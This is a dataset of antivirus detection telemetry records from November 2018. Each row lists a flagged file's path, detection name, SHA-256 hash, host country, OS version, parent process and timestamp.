  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:40:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093422-3256028f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d29325e0\\AVSCAN-20181104-091928-B5729A14\\AVSCAN-20181104-093422-3256028F', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:36:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:07:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\10xyf3kskkc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:59:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\setup.exe', filesize=676000, name='HEUR/AGEN.1030930.#M1.#R1'), hash='038bc8ffd03a5d58976a1bc096aa46d8079febf9179634e3417943ee3c8476bb', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T11:05:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d83f', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d83f', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160612-32877835', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6dd188d4\\AVSCAN-20181104-154238-9EA5EEC4\\AVSCAN-20181104-160612-32877835', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:06:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='master 2 gse.exe', filepath='G:\\Master 2 GSE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updatus.17175618_runasuser.exe', filepath='C:\\ProgramData\\NVIDIA\\Updatus\\Download\\5424\\updatus.17175618_RUNASUSER.exe', filesize=424000, name='W32/Sality.AT.#M1.#R1'), hash='11c354d74467691a2aab9413de32898977302639ea2def28d4745022c8c258eb', metadata=Row(cmdline='startupshow', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malware Crusher\\mcr.exe', parentsize=3896168, timestamp='2018-11-04T13:33:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8975', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8975', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='4d778157f4ff4a96304503cad4e99acb2836ca50b089c72d4b72aed38832779a', metadata=Row(cmdline='\\\\\\/Embedding', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T08:13:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175019-3ae5c20a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30c8b421\\AVSCAN-20181104-174942-36A5BB27\\AVSCAN-20181104-175019-3AE5C20A', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:50:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spot kredi.xls', filepath='D:\\Files\\arsiv\\old_users\\handeg\\BELGELER\\Şirket Belgeleri\\YALOVA DOCS\\EXCEL FILES\\BUDGET\\FINANS\\KREDİ TAKİP\\SPOT KREDI.xls', filesize=384000, name='X97M/Laroux.FK.#M1.#R1'), hash='8b5cd54cb25ca5d144f46ea3192847249904b5e6a531df044d3d9cb058533e59', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:13:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003390.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003390.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='6665c40953aaf482f54b49b9085a0b9797cd6a7ae2fdd9bcdd1733d744a9bd90', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:28:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:21:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f88c7', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f88c7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000620f0', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp000620f0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00001244', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00001244', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-094820-86546987', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e94398e3\\AVSCAN-20181104-094646-7AE93737\\AVSCAN-20181104-094820-86546987', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:48:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c364b5f31a3373443bd737abb4764e6c7955a749855a497937a97c9e5f49d65e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C364B5F31A3373443BD737ABB4764E6C7955A749855A497937A97C9E5F49D65E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c364b5f31a3373443bd737abb4764e6c7955a749855a497937a97c9e5f49d65e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:51:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162712-0a66fcb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a06e1a1c\\AVSCAN-20181104-162611-03054B3A\\AVSCAN-20181104-162712-0A66FCB8', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:27:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lslo.exe', filepath='C:\\Windows\\Temp\\lslo.exe', filesize=2368000, name='HEUR/AGEN.1026219.#M1.#R1'), hash='847d31acc7caea1d534b2f021bdcd029bcc67b6818e8dc108413a999463b4d5c', metadata=Row(cmdline='\\\\\\/c C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\lslo.exe', country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=315392, timestamp='2018-11-04T00:39:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214436-6b42727b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be05e77\\AVSCAN-20181104-214423-68A4AA1C\\AVSCAN-20181104-214436-6B42727B', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:44:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222110-c4b19d11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-222110-C4B19D11', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ultraiso.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\UltraISO.exe', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asdlnaserverreal.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\Remote GO!\\AsDLNAServerReal.exe', filesize=740000, name='W32/Sality.AT.#M1.#R1'), hash='9b0e8241995925093843498aa94953de110228fca66decb1a6de62ef7d462a4e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\92C58C566FE837C7534FDA77D61910D6F60FAA502BA4106DB032949794686293', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110241-bca41071', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110241-BCA41071', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:30:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f4f24b0d99d88e117e68bf294a4996def5800efed870af24f3d3d46feca63801', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080709-243aa6a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-080709-243AA6A7', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d3888b29071bb352e22633c06bdb76df35e32ff1b5f19386b7ac51711e2f7594', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:09:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kaelin.exe', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kaelin.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134943-cbd5c513', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8621c214\\AVSCAN-20181102-134659-403660AD\\AVSCAN-20181102-134943-CBD5C513', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T12:49:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155337-fb133ac7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bcb311d4\\AVSCAN-20181102-155327-F91ABCEC\\AVSCAN-20181102-155337-FB133AC7', filesize=5644000, name='PUA/OpenCandy.#M1.#R1'), hash='e7c7de9c5a78e67740cc849fcd9d2cc760be1688ffb045d6dd38a0eb286defae', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164318-f4d07298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-163849-D5856EBF\\AVSCAN-20181102-164318-F4D07298', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:40:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2345pinyinconfig.exe', filepath='C:\\PROGRAM FILES (X86)\\2345Soft\\2345PINYIN\\5.4.1.6820\\2345PinyinConfig.exe', filesize=5672000, name='W32/Sality.AT.#M1.#R1'), hash='d44100a6894846566eb08d0ba6581c40ae2fa5076edcdab567340c2564a0865d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SmartCloudInput\\1.3.6.10910\\SCCloud.exe', parentsize=1950792, timestamp='2018-11-02T08:44:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='injection.exe', filepath='C:\\Users\\X\\AppData\\Local\\injection.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='7f62bf2df9e8e5f63ccc4c492e0cc60d672f12a5ed28f576a3b5a47c189f10e3', metadata=Row(cmdline='beaal', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\injection.exe', parentsize=384000, timestamp='2018-11-02T01:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nss9C09.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T08:52:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='edman.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\edman.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='warface my.com_eu__na__07.02.2017_.exe', filepath='D:\\warface my.com_EU__NA__07.02.2017_.exe', filesize=1408000, name='HEUR/AGEN.1004088.#M1.#R1'), hash='c915f226d6f4fbb89f7686abcedebcb0fcce5ad27f75ed64d3a5b34e147b8454', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T07:19:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbintel.sys', filepath='\\\\nas-server\\public\\festplatte usb3\\hddrive2go (q)\\WINDOWS\\$ntservicepackuninstall$\\usbintel.sys', filesize=16000, name='TR/Patched.Ren.Gen2.#M300.#R100869'), hash='73b479f135402f32681565a9850d9138817f9a20dad6ec3af58daf16471240bc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:HIXCYj228kiWgUCb.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T13:49:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bgf8mewf.exe', filepath='C:\\Users\\X\\Desktop\\bgF8mEwf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='A1', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T12:30:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b9cf355948929bb8721772d523ac0abb1b485d84063e82e7107f02d177eedba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B9CF355948929BB8721772D523AC0ABB1B485D84063E82E7107F02D177EEDBA', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='8b9cf355948929bb8721772d523ac0abb1b485d84063e82e7107f02d177eedba', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:53:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201033-f0d0da81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae9b6c3c\\AVSCAN-20181102-200924-E5E51EDF\\AVSCAN-20181102-201033-F0D0DA81', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:10:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fc1336f1db80e2bbecdc4a7eb37f1edbdcc213246561179925a5f738baab15b0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\FC1336F1DB80E2BBECDC4A7EB37F1EDBDCC213246561179925A5F738BAAB15B0', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='fc1336f1db80e2bbecdc4a7eb37f1edbdcc213246561179925a5f738baab15b0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075943-0b37f9fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-075943-0B37F9FB', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\vywwtxht21u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:12Z'), dt=datetime.date(2018, 11, 2)),
